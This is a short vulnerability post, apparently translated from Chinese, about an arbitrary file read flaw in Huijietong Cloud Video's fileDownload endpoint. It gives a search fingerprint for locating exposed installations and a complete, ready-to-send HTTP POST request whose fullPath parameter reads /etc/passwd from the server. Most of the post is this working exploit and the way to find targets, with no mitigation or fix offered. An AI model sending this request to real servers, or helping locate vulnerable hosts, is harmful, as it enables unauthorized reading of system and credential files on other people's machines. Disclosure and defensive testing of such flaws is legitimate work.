Huijietong Cloud Video Filedownload Arbitrary File Reading Vulnerability
Huijietong Cloud Video Filedownload Arbitrary File Reading Vulnerability
Huijietong Cloud Video fileDownload any file reading vulnerability
Vulnerability Description
Huijietong Cloud Video fileDownload There is a vulnerability to read any file on the server through the vulnerability.
Vulnerability Impact
Huijietong Cloud Video
Network surveying and mapping
body=”/him/api/rest/v1.0/node/role”
Vulnerability reappears
The login page is as follows
Send a request packet
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host:
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
fullPath=%2Fetc%2Fpasswd
##
This post is licensed under CC BY 4.0 by the author.